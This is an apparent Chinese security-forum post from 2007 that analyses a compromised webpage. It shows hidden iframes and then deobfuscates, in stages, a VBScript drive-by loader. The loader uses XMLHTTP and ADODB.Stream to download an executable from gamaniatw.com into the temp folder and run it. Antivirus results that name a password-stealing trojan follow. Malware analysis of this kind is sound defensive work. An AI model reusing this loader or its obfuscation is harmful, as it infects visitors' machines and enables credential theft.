在页面最后被iframe- <iframe src=http://www.gamaniatw.com/img/love.htm width=0 height=0 frameborder=0></iframe>
复制代码- [code]
- <iframe src=http://www.gamaniatw.com/img/3.htm width=0 height=0 frameborder=0></iframe>
复制代码 第一个无法访问,放弃
然后查看代码- <HTM L >
- <SCRIPT LA NGU A GE="Ja v a s c ri pt" >
- <!--
- document.wri te(u nesca pe("%3C html%3E% 0D% 0A %3Ct i tl e%3E %3C%2F t it le% 3 E %0 D%0A%3C he a d %3ETes t %2 E %2E%2E % 0D% 0A% 3Cbod y%3 E%0 D% 0 A %3Cscrip t%20lang u a ge%3D %22VB Scri p t % 22 % 3E% 0D %0A % 0D %0A on%20 er ro r %20re sume%2 0ne xt % 0D%0 A%0D%0A oqf n0 b1q824251 2nlkjngkjas f dhupi1n g3 r gt%3D%22S h ell % 2E A ppl icat i on % 22%0D% 0 A % 0 D % 0A% 27 %20 due %20to%20h ow%20aj ax% 2 0w orks%2C%20 t h e%2 0f ile% 20M UST %20 be%20wi thin%20the %20 s am e%2 0 l o cal %20d omain%0D % 0A d l% 20%3 D %2 0% 2 2 http%3A%2 F% 2F520% 2Egam an i atw% 2Ecom %2F520% 2 Ee x e%22% 0D % 0A%0D% 0A % 2 7 %20 c r ea te % 20a do dbst ream%20o bje ct % 0D% 0 ASet % 2 0df %2 0 % 3 D%2 0d o cu ment%2 E cr e ateEl e ment % 28%22ob j e ct %2 2%29%0D%0A d f %2 Ese tAt t ri b ut e %20%22c l as sid%22 % 2C% 2 0%2 2c l si d % 3ABD96C556% 2D 65A 3%2 D11 D 0 %2D 98 3 A% 2D00 C04 FC29E36 %2 2% 0D% 0 Astr%3D%2 2 M i cr o s oft %2EXM LHTTP% 22 %0 D %0 ASe t % 20 x%20 % 3D%20df %2ECre ateO bjec t%2 8 st r %2 C%2 2% 22% 2 9 % 0 D% 0A%0 D% 0 A a1 % 3 D % 22A d o %2 2 %0D%0Aa2 % 3D %22db% 2E % 22%0D% 0 Aa 3 %3D%2 2S t r%2 2%0 D%0Aa4%3D%2 2 ea m %22%0D%0A s tr1% 3Da1% 26a2%2 6a3 %2 6 a 4 % 0D %0As t r5% 3Dstr1%0D %0Aset %20S %2 0 %3 D%2 0df%2Ecreateobj ec t %28 st r 5 % 2 C%22%22%29 % 0D% 0AS% 2Etype %2 0 %3D %20 1%0 D% 0 A %0D%0 A% 27%20x m l%2 0 ajax%20req % 0D%0A s tr6%3D %22 G E T% 2 2 %0D % 0 Ax% 2E Open%2 0 str6%2 C %20dl%2C%20 F a lse% 0D%0A x%2ES end % 0 D% 0 A % 0 D%0 A%27% 20Ge t% 2 0 temp% 20d i recto r y%2 0an d% 2 0 create % 2 0o u r% 20des tination% 20 name% 0D%0 A fna me1 % 3D%22220 8 5% 2 E com% 22%0D%0As et%20F%20 % 3 D% 20df% 2 Ec r eateob je c t%2 8 %22Scr ipti ng %2 EF ileS yst e mO bject%22 %2C%22%2 2%29%0D%0Aset %2 0tm p% 20%3D%20F %2 EGe tS pec ialFold er%28 2% 2 9%20% 2 7 %2 0Ge t %20t m p%20fold er%0 D%0A f na m e 1% 3 D %2 0F%2E Bui ld Path %28 tmp%2 Cfname1 % 29% 0D% 0AS %2E open%0D%0A%27%2 0open%2 0ad od b%20st r e am %2 0 an d % 2 0 wr it e% 20conte nts%20of % 2 0 req u e s t%2 0to%20fi le%0D %0A % 2 7%20 like% 20vb s% 2 0dl % 2 B e xec% 2 0 co de%0D%0 A S%2 Ew rit e%20 x%2E respo nseBody% 0D %0A%27%2 0S a ves%20it% 20 w it h%20Cr eateO ve rwri te %2 0fl ag% 0D%0AS%2 Esa vetofile%20fname1%2 C2%0D%0 A%0D%0AS % 2 Eclo se% 0D%0 Aset% 2 0 Q %20 % 3D% 20df%2E create object % 28oqfn0 b1q 8242 512nl kjn gkj asfd hupi1 ng 3rgt %2 C% 2 2%22 %29 %0D%0A Q%2 ES hel lExe cut e%2 0fna me1% 2 C% 2 2% 22% 2C%22%22%2C%22op en%22% 2C0% 0 D %0A%0D%0A %3 C%2F sc ri pt % 3E%0D % 0 A%3C % 2Fb o dy %3E% 0D%0 A%3C %2 Fh ead%3E%0D%0A% 3 C % 2Fht ml %3 E " ))
- //- -></ SC RIP T>
- < / HTML>
复制代码 之后简单的去掉无聊的空格,得到- <HTML>
- <SCRIPTLANGUAGE="Javascript">
- <!--
- document.write(unescape("%3Chtml%3E%0D%0A%3Ctitle%3E%3C%2Ftitle
- %3E%0D%0A%3Chead%3ETest%2E%2E%2E%0D%0A%3Cbody%3E%0D%0A%3C
- script%20language%3D%22VBScript%22%3E%0D%0A%0D%0Aon%20error%20resume%20
- next%0D%0A%0D%0Aoqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt%3D%22Shell%2EApplication%2
- 2%0D%0A%0D%0A%27%20due%20to%20how%20ajax%20works%2C%20the%
- 20file%20MUST%20be%20within%20the%20same%20local%20domain%0D%0Ad
- l%20%3D%20%22http%3A%2F%2F520%2Egamaniatw%2Ecom%2F520%2Eexe
- %22%0D%0A%0D%0A%27%20create%20adodbstream%20object%0D%0ASet
- %20df%20%3D%20document%2EcreateElement%28%22object%22%29%0D%0
- Adf%2EsetAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556%2D65A3
- %2D11D0%2D983A%2D00C04FC29E36%22%0D%0Astr%3D%22Microsoft%2EXMLH
- TTP%22%0D%0ASet%20x%20%3D%20df%2ECreateObject%28str%2C%22%22%2
- 9%0D%0A%0D%0Aa1%3D%22Adao%22%0D%0Aa2%3D%22db%2E%22%0D%0Aa
- 3%3D%22Str%22%0D%0Aa4%3D%22eam%22%0D%0Astr1%3Da1%26a2%26a
- 3%26a4%0D%0Astr5%3Dstr1%0D%0Aset%20S%20%3D%20df%2Ecreateobject%
- 28str5%2C%22%22%29%0D%0AS%2Etype%20%3D%201%0D%0A%0D%0A%27%
- 20xml%20ajax%20req%0D%0Astr6%3D%22GET%22%0D%0Ax%2EOpen%20str6%2
- C%20dl%2C%20False%0D%0Ax%2ESend%0D%0A%0D%0A%27%20Get%20temp%
- 20directory%20and%20create%20our%20destination%20name%0D%0Afname1%3D%
- 2222085%2Ecom%22%0D%0Aset%20F%20%3D%20df%2Ecreateobject%28%22Scri
- pting%2EFileSystemObject%22%2C%22%22%29%0D%0Aset%20tmp%20%3D%20F
- %2EGetSpecialFolder%282%29%20%27%20Get%20tmp%20folder%0D%0Afname1%
- 3D%20F%2EBuildPath%28tmp%2Cfname1%29%0D%0AS%2Eopen%0D%0A%27%20
- open%20adodb%20stream%20and%20write%20contents%20of%20request%20to%
- 20file%0D%0A%27%20like%20vbs%20dl%2Bexec%20code%0D%0AS%2Ewrite%20x%
- 2EresponseBody%0D%0A%27%20Saves%20it%20with%20CreateOverwrite%20flag%0D
- %0AS%2Esavetofile%20fname1%2C2%0D%0A%0D%0AS%2Eclose%0D%0Aset%20Q%2
- 0%3D%20df%2Ecreateobject%28oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt%2C%22%22
- %29%0D%0AQ%2EShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%2
- 2%2C0%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%3C%2Fbody%3E%0D%0A%3C%
- 2Fhead%3E%0D%0A%3C%2Fhtml%3E"))
- //--></SCRIPT>
- </HTML>
复制代码 这个时候如果保存antivir已经会报HTML/Dldr.Maran.AU,强 (做下广告)
p.s 我随便切的,想解析的自己下下面的html附件
Found nothing
Found HTML/Dldr.Maran.AU
Found HTML.JScritp.Lucifer
Found nothing
AVG Antivirus
Found nothing
Found nothing
Found nothing
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Found nothing
Kaspersky Anti-Virus
Found nothing
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Rising Antivirus
Found nothing
Found JS.Psyme.DU
Found nothing
简单的用unicode解析,得到- <html>
- <title></title>
- <head>Test...
- <body>
- <script language="VBScript">
- on error resume next
- oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt="Shell.Application"
- ' due to how ajax works, the file MUST be within the same local domain
- dl = "http://520.gamaniatw.com/520.exe"
- ' create adodbstream object
- Set df = document.createElement("object")
- df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
- str="Microsoft.XMLHTTP"
- Set x = df.CreateObject(str,"")
- a1="Adao"
- a2="db."
- a3="Str"
- a4="eam"
- str1=a1&a2&a3&a4
- str5=str1
- set S = df.createobject(str5,"")
- S.type = 1
- ' xml ajax req
- str6="GET"
- x.Open str6, dl, False
- x.Send
- ' Get temp directory and create our destination name
- fname1="22085.com"
- set F = df.createobject("Scripting.FileSystemObject","")
- set tmp = F.GetSpecialFolder(2) ' Get tmp folder
- fname1= F.BuildPath(tmp,fname1)
- S.open
- ' open adodb stream and write contents of request to file
- ' like vbs dl+exec code
- S.write x.responseBody
- ' Saves it with CreateOverwrite flag
- S.savetofile fname1,2
- S.close
- set Q = df.createobject(oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt,"")
- Q.ShellExecute fname1,"","","open",0
- </script>
- </body>
- </head>
- </html>
复制代码 样本链接就不用我说了吧,虽然比较老
Found nothing
Found TR/PSW.Maran.AU
Found nothing
Found Win32:Lineage-406
AVG Antivirus
Found Generic4.CBU
Found Generic.PWS.Maran.338C67BA
Found nothing
Found Trojan.PWS.Maran
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found Trojan-PSW.Win32.Maran.eu
Found nothing
Kaspersky Anti-Virus
Found Trojan-PSW.Win32.Maran.eu
Found probably a variant of Win32/PSW.Maran (probable variant)
Norman Virus Control
Found nothing
Panda Antivirus
Found Trj/Maran.AR
Rising Antivirus
Found nothing
Found Trojan.PWS.Maran.EK
Found nothing
[ 本帖最后由 mofunzone 于 2007-5-16 19:43 编辑 ] |